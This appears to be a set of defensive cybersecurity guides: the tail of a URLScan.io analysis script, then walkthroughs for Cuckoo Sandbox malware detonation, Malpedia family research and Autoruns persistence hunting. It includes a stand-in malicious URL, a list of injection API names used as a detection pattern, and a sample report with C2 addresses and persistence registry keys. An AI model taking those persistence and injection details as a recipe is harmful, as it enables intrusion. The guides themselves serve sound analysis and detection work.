    lines.append(f" Country: {result.country}")
    lines.append(f" Server: {result.server}")
    lines.append(f" Login Form: {'DETECTED' if result.has_login_form else 'Not found'}")
    lines.append(f" Screenshot: {result.screenshot_url}")
    lines.append("")

    if result.tls_issuer:
        lines.append("[TLS CERTIFICATE]")
        lines.append(f" Issuer: {result.tls_issuer}")
        lines.append(f" Subject: {result.tls_subject}")
        lines.append("")

    if result.redirects:
        lines.append(f"[REDIRECTS] ({len(result.redirects)} found)")
        for r in result.redirects[:10]:
            lines.append(f" -> {r}")
        lines.append("")

    if result.risk_indicators:
        lines.append(f"[RISK INDICATORS] ({len(result.risk_indicators)})")
        for ind in result.risk_indicators:
            lines.append(f" - {ind}")
        lines.append("")

    lines.append("[INFRASTRUCTURE]")
    lines.append(f" Domains contacted: {len(result.domains_contacted)}")
    lines.append(f" IPs contacted: {len(result.ips_contacted)}")
    lines.append(f" Resource hashes: {len(result.resource_hashes)}")

    lines.append("=" * 60)
    return "\n".join(lines)


def main():
    parser = argparse.ArgumentParser(description="URLScan.io URL Analysis Tool")
    subparsers = parser.add_subparsers(dest="command")

    scan_parser = subparsers.add_parser("scan", help="Scan a URL")
    scan_parser.add_argument("--url", help="Single URL to scan")
    scan_parser.add_argument("--url-file", help="File with URLs (one per line)")
    scan_parser.add_argument("--visibility", default="private",
                             choices=["public", "unlisted", "private"])
    scan_parser.add_argument("--wait", action="store_true", help="Wait for results")

    result_parser = subparsers.add_parser("result", help="Get scan result")
    result_parser.add_argument("--uuid", required=True)

    search_parser = subparsers.add_parser("search", help="Search URLScan database")
    search_parser.add_argument("--query", "-q", required=True)
    search_parser.add_argument("--size", type=int, default=10)

    ioc_parser = subparsers.add_parser("ioc", help="Extract IOCs from scan")
    ioc_parser.add_argument("--uuid", required=True)

    parser.add_argument("--api-key", default=URLSCAN_API_KEY)
    parser.add_argument("--json", action="store_true")
    parser.add_argument("--output", "-o")

    args = parser.parse_args()

    if not HAS_REQUESTS:
        print("Error: 'requests' library required", file=sys.stderr)
        sys.exit(1)

    api_key = args.api_key

    if args.command == "scan":
        urls = []
        if args.url:
            urls.append(args.url)
        elif args.url_file:
            with open(args.url_file) as f:
                urls = [line.strip() for line in f if line.strip()]

        for url in urls:
            print(f"Scanning: {url}")
            scan_result = submit_scan(url, args.visibility, api_key)

            if "error" in scan_result:
                print(f" Error: {scan_result['error']}", file=sys.stderr)
                continue

            uuid = scan_result.get("uuid", "")
            print(f" UUID: {uuid}")
            print(f" Result URL: https://urlscan.io/result/{uuid}/")

            if args.wait and uuid:
                print(" Waiting for results...")
                time.sleep(10)
                raw = get_result(uuid, api_key)
                if "error" not in raw:
                    result = parse_result(raw)
                    if args.json:
                        print(json.dumps(asdict(result), indent=2, default=str))
                    else:
                        print(format_report(result))

            if len(urls) > 1:
                time.sleep(2)  # Rate limiting

    elif args.command == "result":
        raw = get_result(args.uuid, api_key)
        if "error" in raw:
            print(f"Error: {raw['error']}", file=sys.stderr)
            sys.exit(1)
        result = parse_result(raw)
        if args.json:
            print(json.dumps(asdict(result), indent=2, default=str))
        else:
            print(format_report(result))

    elif args.command == "search":
        results = search_scans(args.query, api_key, args.size)
        for r in results:
            task = r.get("task", {})
            page = r.get("page", {})
            print(f" {task.get('time', '')} | {task.get('url', '')} | "
                  f"{page.get('domain', '')} | {page.get('ip', '')}")

    elif args.command == "ioc":
        raw = get_result(args.uuid, api_key)
        if "error" in raw:
            print(f"Error: {raw['error']}", file=sys.stderr)
            sys.exit(1)
        result = parse_result(raw)
        iocs = extract_iocs(result)
        print(json.dumps(iocs, indent=2))

    else:
        parser.print_help()


if __name__ == "__main__":
    main()
@@ -0,0 +1,287 @@
|
||||
---
name: analyzing-malware-behavior-with-cuckoo-sandbox
description: >
  Executes malware samples in Cuckoo Sandbox to observe runtime behavior including
  process creation, file system modifications, registry changes, network communications,
  and API calls. Generates comprehensive behavioral reports for malware classification
  and IOC extraction. Activates for requests involving dynamic malware analysis, sandbox
  detonation, behavioral analysis, or automated malware execution.
domain: cybersecurity
subdomain: malware-analysis
tags: [malware, dynamic-analysis, sandbox, Cuckoo, behavioral-analysis]
version: 1.0.0
author: mahipal
license: MIT
---

# Analyzing Malware Behavior with Cuckoo Sandbox

## When to Use

- A suspicious sample passed static analysis triage and requires behavioral observation in a controlled environment
- You need to capture network traffic, file drops, registry modifications, and API calls from a malware execution
- Determining the full infection chain including second-stage payload downloads and persistence mechanisms
- Generating behavioral signatures and YARA rules based on observed runtime activity
- Automated analysis of bulk malware samples requiring consistent reporting

**Do not use** when the sample is a known ransomware variant that may spread via network shares in a misconfigured sandbox; verify network isolation first.

## Prerequisites

- Cuckoo Sandbox 3.x installed on a dedicated analysis server (Ubuntu 22.04 recommended); the `cuckoo submit` options, REST endpoints, and `/opt/cuckoo` paths used below follow the Cuckoo 2.x layout and may need adjusting for your version
- Guest VMs configured with Windows 10/11 snapshots (Cuckoo agent installed, snapshots taken at clean state)
- VirtualBox, KVM, or VMware configured as the Cuckoo virtualization backend
- Isolated network with InetSim or FakeNet-NG for simulating internet services
- Suricata or Snort integrated for network-level signature matching during analysis
- Sufficient disk space for PCAP captures and memory dumps (minimum 500 GB recommended)

## Workflow

### Step 1: Submit Sample to Cuckoo

Submit the malware sample for automated analysis:

```bash
# Submit via command line
cuckoo submit /path/to/suspect.exe

# Submit with specific analysis timeout (300 seconds)
cuckoo submit --timeout 300 /path/to/suspect.exe

# Submit with specific VM and analysis package
cuckoo submit --machine win10_x64 --package exe --timeout 300 /path/to/suspect.exe

# Submit via REST API
curl -F "file=@suspect.exe" -F "timeout=300" -F "machine=win10_x64" \
     http://localhost:8090/tasks/create/file

# Submit URL for analysis
curl -F "url=http://malicious-site.com/payload" -F "timeout=300" \
     http://localhost:8090/tasks/create/url

# Check task status
curl http://localhost:8090/tasks/view/1 | jq '.task.status'
```

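The status check above can be wrapped in a polling loop so that later steps only run once the report exists. This is a minimal sketch under stated assumptions: `fetch_status` is a hypothetical callable you supply (for example a wrapper around a GET to `/tasks/view/<id>` that returns the `task.status` string), and the status names `reported` and `failed...` are assumed to mark the terminal states of a task. The sketch itself makes no network calls.

```python
import time
from typing import Callable


def wait_for_report(fetch_status: Callable[[int], str], task_id: int,
                    timeout: float = 600.0, interval: float = 10.0,
                    sleep: Callable[[float], None] = time.sleep) -> bool:
    """Poll until the task is 'reported' or the timeout expires.

    fetch_status is a hypothetical helper returning the task's status string.
    Returns True when the report is ready, False on timeout.
    """
    waited = 0.0
    while waited <= timeout:
        status = fetch_status(task_id)
        if status == "reported":
            return True
        if status.startswith("failed"):
            # Assumed naming for failure states (e.g. failed_analysis)
            raise RuntimeError(f"task {task_id} ended with status {status!r}")
        sleep(interval)
        waited += interval
    return False
```

Passing `sleep` as a parameter keeps the loop easy to exercise in tests without real delays.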
### Step 2: Monitor Execution in Real-Time

Track the analysis progress and observe live behavior:

```bash
# Watch Cuckoo analysis log
tail -f /opt/cuckoo/log/cuckoo.log

# Monitor overall Cuckoo and task queue status via the REST API
curl http://localhost:8090/cuckoo/status

# Access Cuckoo web interface for live screenshots and process tree
# Navigate to http://localhost:8080/analysis/<task_id>/
```

Key behavioral events to watch during execution:
- Process creation chain (parent-child relationships)
- Network connection attempts to external IPs
- File drops in temporary directories or system folders
- Registry modifications to Run keys or service entries
- API calls related to encryption (CryptEncrypt), injection (WriteProcessMemory), or evasion

### Step 3: Analyze Process Activity

Review the process tree and API call trace from the Cuckoo report:

```python
# Parse Cuckoo JSON report programmatically
import json

with open("/opt/cuckoo/storage/analyses/1/reports/report.json") as f:
    report = json.load(f)

# Process tree analysis
for process in report["behavior"]["processes"]:
    pid = process["pid"]
    ppid = process["ppid"]
    name = process["process_name"]
    print(f"PID: {pid} PPID: {ppid} Name: {name}")

    # Extract suspicious API calls
    for call in process["calls"]:
        api = call["api"]
        if api in ["CreateRemoteThread", "VirtualAllocEx", "WriteProcessMemory",
                   "NtCreateThreadEx", "RegSetValueExA", "URLDownloadToFileA"]:
            # Depending on the report version, arguments are either a dict or
            # a list of {"name": ..., "value": ...} entries; handle both.
            arguments = call["arguments"]
            if isinstance(arguments, dict):
                args = arguments
            else:
                args = {arg["name"]: arg["value"] for arg in arguments}
            print(f" [!] {api}({args})")
```

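The flat PID/PPID listing above can be turned into an indented tree, which makes dropper chains easier to read. A minimal sketch, assuming each process entry carries the `pid`, `ppid`, and `process_name` fields used above; the `sample` data is illustrative and not taken from a real report.

```python
from collections import defaultdict


def build_process_tree(processes):
    """Return indented tree lines built from pid/ppid relationships."""
    children = defaultdict(list)
    known_pids = {p["pid"] for p in processes}
    for proc in processes:
        children[proc["ppid"]].append(proc)

    lines = []

    def walk(proc, depth):
        lines.append(f"{'  ' * depth}{proc['process_name']} (PID: {proc['pid']})")
        for child in sorted(children.get(proc["pid"], []), key=lambda p: p["pid"]):
            walk(child, depth + 1)

    # Roots are processes whose parent was not captured in the report.
    for proc in processes:
        if proc["ppid"] not in known_pids:
            walk(proc, 0)
    return lines


# Illustrative data only
sample = [
    {"pid": 2184, "ppid": 1200, "process_name": "suspect.exe"},
    {"pid": 3456, "ppid": 2184, "process_name": "cmd.exe"},
    {"pid": 4012, "ppid": 3456, "process_name": "powershell.exe"},
]
print("\n".join(build_process_tree(sample)))
```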
### Step 4: Review Network Activity

Examine network connections, DNS queries, and HTTP requests:

```python
# Network analysis from Cuckoo report
network = report["network"]

# DNS resolutions
print("DNS Queries:")
for dns in network.get("dns", []):
    print(f" {dns['request']} -> {dns.get('answers', [])}")

# HTTP requests
print("\nHTTP Requests:")
for http in network.get("http", []):
    print(f" {http['method']} {http['uri']} (Host: {http['host']})")
    if http.get("body"):
        print(f" Body: {http['body'][:200]}")

# TCP connections
print("\nTCP Connections:")
for tcp in network.get("tcp", []):
    print(f" {tcp['src']}:{tcp['sport']} -> {tcp['dst']}:{tcp['dport']}")

# Extract PCAP for deeper Wireshark analysis
# PCAP location: /opt/cuckoo/storage/analyses/1/dump.pcap
```

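For IOC extraction it usually helps to separate external destinations from sandbox-internal traffic. The sketch below assumes the `network` section has the `dns` and `tcp` shapes used above, plus an optional `udp` list of the same form (an assumption); the function name is hypothetical. Note that with InetSim or FakeNet-NG in place, resolved addresses may be simulated rather than real C2 infrastructure.

```python
import ipaddress


def external_network_iocs(network):
    """Collect queried domains and globally routable destination IPs."""
    domains = sorted({d["request"] for d in network.get("dns", []) if d.get("request")})
    ips = set()
    for conn in network.get("tcp", []) + network.get("udp", []):
        dst = conn.get("dst", "")
        try:
            addr = ipaddress.ip_address(dst)
        except ValueError:
            continue  # skip empty or malformed addresses
        if addr.is_global:  # drops private, loopback, and link-local ranges
            ips.add(dst)
    return {"domains": domains, "ips": sorted(ips)}
```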
### Step 5: Examine File System and Registry Changes

Document persistence mechanisms and dropped files:

```python
# File operations
print("Files Created/Modified:")
for f in report["behavior"].get("summary", {}).get("files", []):
    print(f" {f}")

# Dropped files with hashes
print("\nDropped Files:")
for dropped in report.get("dropped", []):
    print(f" Path: {dropped['filepath']}")
    print(f" SHA-256: {dropped['sha256']}")
    print(f" Size: {dropped['size']} bytes")
    print(f" Type: {dropped['type']}")

# Registry modifications
print("\nRegistry Keys Modified:")
for key in report["behavior"].get("summary", {}).get("keys", []):
    print(f" {key}")
```

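Registry output is often long, so a quick filter for well-known autostart locations can highlight likely persistence. This is a sketch only: the marker list is a small, non-exhaustive assumption, and `flag_persistence_keys` is a hypothetical helper, not part of Cuckoo.

```python
# Lowercase substrings of common persistence locations (not exhaustive)
PERSISTENCE_MARKERS = (
    r"\currentversion\run",          # Run and RunOnce autostart keys
    r"\currentcontrolset\services",  # service installation
    r"\winlogon",                    # Winlogon shell/userinit values
)


def flag_persistence_keys(keys):
    """Return the registry keys that match a known persistence location."""
    return [k for k in keys if any(m in k.lower() for m in PERSISTENCE_MARKERS)]
```

For example, passing the list from `summary["keys"]` returns only the entries under Run keys, services, or Winlogon for closer review.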
### Step 6: Review Signatures and Scoring

Check Cuckoo's behavioral signatures and threat scoring:

```python
# Behavioral signatures triggered
print("Triggered Signatures:")
for sig in report.get("signatures", []):
    severity = sig["severity"]
    name = sig["name"]
    description = sig["description"]
    marker = "[!]" if severity >= 3 else "[*]"
    print(f" {marker} [{severity}/5] {name}: {description}")
    for mark in sig.get("marks", []):
        if mark.get("call"):
            print(f" API: {mark['call']['api']}")
        if mark.get("ioc"):
            print(f" IOC: {mark['ioc']}")

# Overall score
score = report.get("info", {}).get("score", 0)
print(f"\nOverall Threat Score: {score}/10")
```

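When triaging many reports, a compact summary per sample can be more useful than the full signature listing. A minimal sketch, assuming signatures carry the `name` and `severity` fields used above; the threshold of 3 mirrors the `[!]` marker and the function name is hypothetical.

```python
from collections import Counter


def summarize_signatures(signatures, high_threshold=3):
    """Count signatures per severity and list the high-severity names."""
    counts = Counter(sig.get("severity", 0) for sig in signatures)
    high = sorted(sig["name"] for sig in signatures
                  if sig.get("severity", 0) >= high_threshold)
    return {"by_severity": dict(sorted(counts.items())), "high": high}
```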
### Step 7: Extract Memory Dump Artifacts

Analyze the full memory dump captured during execution:

```bash
# Memory dump is saved at:
# /opt/cuckoo/storage/analyses/1/memory.dmp

# Use Volatility to analyze the memory dump
vol3 -f /opt/cuckoo/storage/analyses/1/memory.dmp windows.pslist
vol3 -f /opt/cuckoo/storage/analyses/1/memory.dmp windows.malfind
vol3 -f /opt/cuckoo/storage/analyses/1/memory.dmp windows.netscan
```

## Key Concepts

| Term | Definition |
|------|------------|
| **Dynamic Analysis** | Executing malware in a controlled environment to observe runtime behavior including system calls, network activity, and file operations |
| **Sandbox Evasion** | Techniques malware uses to detect virtual/sandbox environments and alter behavior to avoid analysis (sleep timers, VM checks, user interaction checks) |
| **API Hooking** | Cuckoo's method of intercepting Windows API calls made by the malware to log function names, parameters, and return values |
| **InetSim** | Internet services simulation tool that responds to malware network requests (HTTP, DNS, SMTP) within the isolated analysis network |
| **Process Injection** | Malware technique of injecting code into legitimate processes; detected by monitoring VirtualAllocEx and WriteProcessMemory API sequences |
| **Behavioral Signature** | Rule-based detection matching specific sequences of API calls, file operations, or network activity to known malware behaviors |
| **Analysis Package** | Cuckoo module defining how to execute a specific file type (exe, dll, pdf, doc) within the guest VM for proper behavioral capture |

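The Process Injection row describes detection by API sequence. The sketch below shows one way to check for such an ordered sequence in a list of API names. The three-call sequence (allocate, write, start thread) is an assumed classic pattern, and real behavioral signatures are typically stricter, for example by also matching the target process handle.

```python
INJECTION_SEQUENCE = ("VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread")


def has_injection_sequence(api_calls, sequence=INJECTION_SEQUENCE):
    """Return True if the APIs in `sequence` occur in order (gaps allowed)."""
    remaining = iter(api_calls)
    # Each step consumes the iterator up to its first match, so later steps
    # can only match calls that appear after the earlier ones.
    return all(any(call == step for call in remaining) for step in sequence)
```

Applied per process, `has_injection_sequence([c["api"] for c in process["calls"]])` would flag candidates for manual review.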
## Tools & Systems

- **Cuckoo Sandbox**: Open-source automated malware analysis system providing behavioral reports, network captures, and memory dumps
- **InetSim**: Internet services simulation suite providing fake HTTP, DNS, SMTP, and other services for isolated malware analysis networks
- **FakeNet-NG**: FLARE team's network simulation tool that intercepts and redirects all network traffic for analysis
- **Suricata**: Network IDS/IPS integrated with Cuckoo for real-time signature-based detection of malicious network traffic
- **Volatility**: Memory forensics framework used to analyze memory dumps captured during Cuckoo analysis

## Common Scenarios

### Scenario: Analyzing a Multi-Stage Dropper

**Context**: Static analysis reveals a packed executable with minimal imports and high entropy. The sample needs sandbox execution to observe unpacking, payload delivery, and C2 establishment.

**Approach**:
1. Submit sample to Cuckoo with extended timeout (600 seconds) to capture slow-acting behavior
2. Review process tree for child process creation (dropper spawning payload processes)
3. Identify dropped files in %TEMP%, %APPDATA%, or system directories
4. Extract dropped files and compute hashes for separate analysis
5. Map network connections to identify C2 infrastructure contacted after initial execution
6. Check for persistence mechanisms (Run keys, scheduled tasks, services) in registry modifications
7. Compare behavioral signatures against known malware families

**Pitfalls**:
- Using insufficient analysis timeout causing the sandbox to terminate before second-stage payload executes
- Not configuring InetSim to respond to DNS and HTTP requests, preventing the malware from progressing past C2 check-in
- Ignoring sandbox evasion detections; if the sample exits immediately, it may be detecting the virtual environment
- Not analyzing dropped files separately; the initial dropper may be less interesting than the final payload

## Output Format

```
DYNAMIC ANALYSIS REPORT - CUCKOO SANDBOX
==========================================
Task ID: 1547
Sample: suspect.exe (SHA-256: e3b0c44298fc1c149afbf4c8996fb924...)
Analysis Time: 300 seconds
VM: win10_x64 (Windows 10 21H2)
Score: 8.5/10

PROCESS TREE
suspect.exe (PID: 2184)
└── cmd.exe (PID: 3456)
    └── powershell.exe (PID: 4012)
        └── svchost_fake.exe (PID: 4568)

FILE SYSTEM ACTIVITY
[CREATED] C:\Users\Admin\AppData\Local\Temp\payload.dll
[CREATED] C:\Windows\System32\svchost_fake.exe
[MODIFIED] C:\Windows\System32\drivers\etc\hosts

REGISTRY MODIFICATIONS
[SET] HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\Windows\System32\svchost_fake.exe"
[SET] HKLM\SYSTEM\CurrentControlSet\Services\FakeService\ImagePath = "C:\Windows\System32\svchost_fake.exe"

NETWORK ACTIVITY
DNS: update.malicious[.]com -> 185.220.101.42
HTTP: POST hxxps://185.220.101[.]42/gate.php (beacon)
TCP: 10.0.2.15:49152 -> 185.220.101.42:443 (237 connections)

BEHAVIORAL SIGNATURES
[!] [4/5] injection_createremotethread: Injects code into remote process
[!] [4/5] persistence_autorun: Modifies Run registry key for persistence
[!] [3/5] network_cnc_http: Performs HTTP C2 communication
[*] [2/5] antiav_detectfile: Checks for antivirus product files

DROPPED FILES
payload.dll SHA-256: abc123... Size: 98304 Type: PE32 DLL
svchost_fake.exe SHA-256: def456... Size: 184320 Type: PE32 EXE
```
@@ -0,0 +1,259 @@
|
||||
---
name: analyzing-malware-family-relationships-with-malpedia
description: Use the Malpedia platform and API to research malware family relationships, track variant evolution, link families to threat actors, and integrate YARA rules for detection across malware lineages.
domain: cybersecurity
subdomain: threat-intelligence
tags: [malpedia, malware-family, yara, threat-actor, malware-tracking, threat-intelligence, variant-analysis, malware-intelligence]
version: "1.0"
author: mahipal
license: MIT
---
# Analyzing Malware Family Relationships with Malpedia

## Overview

Malpedia is a collaborative platform maintained by Fraunhofer FKIE that catalogs malware families with their aliases, YARA rules, threat actor associations, and reference reports. With over 2,600 malware families documented, it is a widely used reference for understanding malware lineages, tracking variant evolution, and linking malware to specific threat groups. This skill covers querying the Malpedia API, mapping malware family relationships, extracting YARA rules for detection, and building intelligence on malware ecosystems used by adversaries.

## Prerequisites

- Python 3.9+ with `requests`, `yara-python`, `stix2` libraries
- Malpedia API key (register at https://malpedia.caad.fkie.fraunhofer.de/)
- Understanding of malware classification and naming conventions
- Familiarity with YARA rule syntax for detection
- Access to malware samples for validation (optional)

## Key Concepts

### Malpedia Data Model

Malpedia organizes malware into Families (e.g., "win.cobalt_strike"), each containing: aliases (vendor-specific names like "Beacon", "CobaltStrike"), YARA rules (community and vendor-contributed), actor associations (threat groups using the family), reference reports (CTI reports documenting the family), and sample hashes (representative samples for each variant).

### Malware Family Naming

Malpedia uses the format `platform.family_name` (e.g., `win.emotet`, `elf.mirai`, `apk.flubot`). Platforms include win (Windows), elf (Linux), apk (Android), osx (macOS), and py (Python). This standardized naming resolves the "many names" problem where different vendors assign different names to the same malware.

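The naming convention is simple enough to parse mechanically, which helps when grouping families by platform. A minimal sketch: the platform labels come from the paragraph above, while `parse_family_id` and the `"unknown"` fallback are illustrative assumptions.

```python
# Platform prefixes named in the text; other prefixes map to "unknown"
PLATFORMS = {"win": "Windows", "elf": "Linux", "apk": "Android",
             "osx": "macOS", "py": "Python"}


def parse_family_id(family_id):
    """Split a 'platform.family_name' identifier into its parts."""
    platform, sep, name = family_id.partition(".")
    if not sep or not platform or not name:
        raise ValueError(f"expected 'platform.family_name', got {family_id!r}")
    return {
        "platform": platform,
        "platform_label": PLATFORMS.get(platform, "unknown"),
        "family": name,
    }


print(parse_family_id("win.emotet"))
```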
### Family Relationships

Malware families have relationships including: parent-child (code reuse, forks), loader-payload (Emotet loads TrickBot loads Ryuk), shared authorship (same threat actor develops multiple tools), and infrastructure sharing (common C2 frameworks).

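Loader-payload relationships form a directed graph, so delivery chains can be enumerated with a simple traversal. The sketch below is illustrative: the edge list encodes the Emotet, TrickBot, Ryuk example from the paragraph above by hand, since this is analyst-curated data rather than something the sketch retrieves from Malpedia, and `delivery_chains` is a hypothetical helper.

```python
from collections import defaultdict


def delivery_chains(edges, start):
    """Enumerate loader-to-payload paths beginning at `start` (depth-first)."""
    graph = defaultdict(list)
    for loader, payload in edges:
        graph[loader].append(payload)

    chains = []

    def walk(node, path):
        # Skip nodes already on the path so cyclic data cannot loop forever
        next_nodes = [n for n in graph.get(node, []) if n not in path]
        if not next_nodes:
            chains.append(path)
            return
        for n in next_nodes:
            walk(n, path + [n])

    walk(start, [start])
    return chains


# Hand-written edges for the example named in the text
edges = [("win.emotet", "win.trickbot"), ("win.trickbot", "win.ryuk")]
print(delivery_chains(edges, "win.emotet"))
```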
## Practical Steps

### Step 1: Query Malpedia API for Malware Families

```python
import requests
import json
from collections import defaultdict

class MalpediaClient:
    BASE_URL = "https://malpedia.caad.fkie.fraunhofer.de/api"

    def __init__(self, api_key):
        self.headers = {"Authorization": f"apitoken {api_key}"}

    def get_family_list(self):
        """Get list of all malware families."""
        resp = requests.get(f"{self.BASE_URL}/list/families",
                            headers=self.headers, timeout=30)
        if resp.status_code == 200:
            families = resp.json()
            print(f"[+] Malpedia: {len(families)} malware families")
            return families
        return {}

    def get_family_info(self, family_name):
        """Get detailed information about a malware family."""
        resp = requests.get(f"{self.BASE_URL}/get/family/{family_name}",
                            headers=self.headers, timeout=30)
        if resp.status_code == 200:
            info = resp.json()
            # Attribution entries may be plain strings or dicts with a
            # "value" key; accept both.
            actors = [a.get("value", "") if isinstance(a, dict) else str(a)
                      for a in info.get("attribution", [])]
            print(f"[+] Family: {family_name}")
            print(f" Aliases: {info.get('alt_names', [])}")
            print(f" Actors: {actors}")
            print(f" URLs: {len(info.get('urls', []))} references")
            return info
        print(f"[-] Family not found: {family_name}")
        return None

    def get_family_yara(self, family_name):
        """Get YARA rules for a malware family."""
        resp = requests.get(f"{self.BASE_URL}/get/yara/{family_name}",
                            headers=self.headers, timeout=30)
        if resp.status_code == 200:
            rules = resp.json()
            rule_count = sum(len(v) for v in rules.values()) if isinstance(rules, dict) else 0
            print(f"[+] YARA rules for {family_name}: {rule_count} rules")
            return rules
        return {}

    def get_actor_families(self, actor_name):
        """Get malware families associated with a threat actor."""
        resp = requests.get(f"{self.BASE_URL}/get/actor/{actor_name}",
                            headers=self.headers, timeout=30)
        if resp.status_code == 200:
            data = resp.json()
            families = data.get("families", {})
            print(f"[+] {actor_name}: {len(families)} malware families")
            return data
        return {}

    def search_families(self, keyword):
        """Search families by keyword."""
        all_families = self.get_family_list()
        # The listing may be a plain list of family IDs or a dict keyed by
        # family ID; normalize to (name, info) pairs before matching.
        if isinstance(all_families, dict):
            entries = all_families.items()
        else:
            entries = ((name, {}) for name in all_families)
        matches = {
            name: info for name, info in entries
            if keyword.lower() in name.lower()
            or keyword.lower() in str(info.get("alt_names", [])).lower()
        }
        print(f"[+] Search '{keyword}': {len(matches)} matches")
        return matches

client = MalpediaClient("YOUR_MALPEDIA_API_KEY")
families = client.get_family_list()
emotet_info = client.get_family_info("win.emotet")
```

### Step 2: Map Malware Family Relationships
|
||||
|
||||
```python
from collections import defaultdict


class MalwareFamilyMapper:
    def __init__(self, malpedia_client):
        self.client = malpedia_client
        # actor name -> family IDs resolved for that actor
        self.relationship_graph = defaultdict(list)

    @staticmethod
    def _actor_names(info):
        """Normalize attribution entries, which may be strings or dicts."""
        return [a.get("value", "") if isinstance(a, dict) else str(a)
                for a in info.get("attribution", [])]

    def map_actor_ecosystem(self, actor_name):
        """Map the malware ecosystem used by a threat actor."""
        actor_data = self.client.get_actor_families(actor_name)
        families = actor_data.get("families", {})

        ecosystem = {
            "actor": actor_name,
            "families": [],
            "family_count": len(families),
        }

        for family_name in families:
            info = self.client.get_family_info(family_name)
            if info:
                self.relationship_graph[actor_name].append(family_name)
                ecosystem["families"].append({
                    "name": family_name,
                    "aliases": info.get("alt_names", []),
                    "description": (info.get("description") or "")[:200],
                    "shared_actors": self._actor_names(info),
                    "reference_count": len(info.get("urls", [])),
                })

        print(f"\n=== {actor_name} Malware Ecosystem ===")
        for fam in ecosystem["families"]:
            # Compare case-insensitively so the queried actor is not listed as "shared"
            shared = [a for a in fam["shared_actors"]
                      if a.lower() != actor_name.lower()]
            print(f"  {fam['name']}")
            print(f"    Aliases: {fam['aliases'][:5]}")
            if shared:
                print(f"    Also used by: {shared}")

        return ecosystem

    def find_shared_tooling(self, actor_names):
        """Find malware families shared between threat actors."""
        actor_families = {}
        for actor in actor_names:
            data = self.client.get_actor_families(actor)
            # set() accepts either a dict keyed by family ID or a list of IDs
            actor_families[actor] = set(data.get("families", {}))

        # Find overlaps between every unordered pair of actors
        shared = {}
        for i, actor1 in enumerate(actor_names):
            for actor2 in actor_names[i + 1:]:
                common = actor_families[actor1] & actor_families[actor2]
                if common:
                    shared[f"{actor1} <-> {actor2}"] = sorted(common)

        print("\n=== Shared Tooling Analysis ===")
        for pair, families in shared.items():
            print(f"  {pair}: {len(families)} shared families")
            for f in families[:5]:
                print(f"    - {f}")

        return shared

    def build_loader_payload_chain(self, family_name):
        """Build the loader-payload delivery chain for a family."""
        info = self.client.get_family_info(family_name)
        if not info:
            return {}

        chain = {
            "family": family_name,
            "description": info.get("description", ""),
            "known_loaders": [],
            "known_payloads": [],
        }

        # Common known delivery chains (a static lookup table, not Malpedia data)
        known_chains = {
            "win.emotet": {"loaders": ["email/macro"], "payloads": ["win.trickbot", "win.qakbot", "win.cobalt_strike"]},
            "win.trickbot": {"loaders": ["win.emotet"], "payloads": ["win.ryuk", "win.conti", "win.cobalt_strike"]},
            "win.qakbot": {"loaders": ["email/macro", "win.emotet"], "payloads": ["win.cobalt_strike", "win.blackbasta"]},
            "win.cobalt_strike": {"loaders": ["win.emotet", "win.trickbot", "win.qakbot"], "payloads": ["ransomware"]},
        }

        if family_name in known_chains:
            chain["known_loaders"] = known_chains[family_name]["loaders"]
            chain["known_payloads"] = known_chains[family_name]["payloads"]

        return chain


mapper = MalwareFamilyMapper(client)
ecosystem = mapper.map_actor_ecosystem("Wizard Spider")
shared = mapper.find_shared_tooling(["Wizard Spider", "FIN7", "Lazarus Group"])
chain = mapper.build_loader_payload_chain("win.emotet")
```
|
||||
|
||||
### Step 3: Extract and Compile YARA Rules
|
||||
|
||||
```python
def compile_yara_ruleset(client, family_names, output_file="malware_yara_rules.yar"):
    """Collect YARA rules for multiple malware families into one rule file."""
    all_rules = []
    for family in family_names:
        yara_data = client.get_family_yara(family)
        if not isinstance(yara_data, dict):
            continue
        for source, rules in yara_data.items():
            # Rules may arrive as a name -> text mapping, a list, or a single string
            if isinstance(rules, dict):
                rule_texts = list(rules.values())
            elif isinstance(rules, list):
                rule_texts = rules
            elif isinstance(rules, str):
                rule_texts = [rules]
            else:
                rule_texts = []
            for rule in rule_texts:
                all_rules.append(f"// Source: {source} - Family: {family}\n{rule}")

    with open(output_file, "w", encoding="utf-8") as f:
        f.write(f"// Malpedia YARA Rules - {len(all_rules)} rules\n")
        f.write(f"// Families: {', '.join(family_names)}\n\n")
        for rule in all_rules:
            f.write(rule + "\n\n")

    print(f"[+] Compiled {len(all_rules)} YARA rules to {output_file}")
    return all_rules


compile_yara_ruleset(client, ["win.emotet", "win.trickbot", "win.cobalt_strike"])
```
|
||||
|
||||
## Validation Criteria
|
||||
|
||||
- Malpedia API queried successfully for malware families
|
||||
- Family information retrieved with aliases, actors, and references
|
||||
- Actor-family relationships mapped correctly
|
||||
- Shared tooling between actors identified
|
||||
- YARA rules extracted and compiled for detection
|
||||
- Loader-payload chains documented for threat intelligence
|
||||
|
||||
## References
|
||||
|
||||
- [Malpedia Platform](https://malpedia.caad.fkie.fraunhofer.de/)
|
||||
- [Malpedia API Documentation](https://malpedia.caad.fkie.fraunhofer.de/usage/api)
|
||||
- [Malpedia Research Paper](https://www.botconf.eu/wp-content/uploads/formidable/2/2017-DanielPlohmann-Malpedia.pdf)
|
||||
- [YARA Rules Project](https://github.com/Yara-Rules/rules)
|
||||
- [malwoverview Multi-Platform Tool](https://github.com/alexandreborges/malwoverview)
|
||||
- [CyberAtlas: Malpedia Integration](https://www.cyberatlas.io/malpedia)
|
||||
@@ -0,0 +1,92 @@
|
||||
---
|
||||
name: analyzing-malware-persistence-with-autoruns
|
||||
description: Use Sysinternals Autoruns to systematically identify and analyze malware persistence mechanisms across registry keys, scheduled tasks, services, drivers, and startup locations on Windows systems.
|
||||
domain: cybersecurity
|
||||
subdomain: malware-analysis
|
||||
tags: [autoruns, persistence, malware-analysis, sysinternals, windows, registry, startup, incident-response]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
# Analyzing Malware Persistence with Autoruns
|
||||
|
||||
## Overview
|
||||
|
||||
Sysinternals Autoruns extracts data from hundreds of Auto-Start Extensibility Points (ASEPs) on Windows, scanning 18+ categories including Run/RunOnce keys, services, scheduled tasks, drivers, Winlogon entries, LSA providers, print monitors, WMI subscriptions, and AppInit DLLs. Digital signature verification filters Microsoft-signed entries. The compare function identifies newly added persistence via baseline diffing. VirusTotal integration checks hash reputation. Offline analysis via -z flag enables forensic disk image examination.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Sysinternals Autoruns (GUI) and Autorunsc (CLI)
|
||||
- Administrative privileges on target system
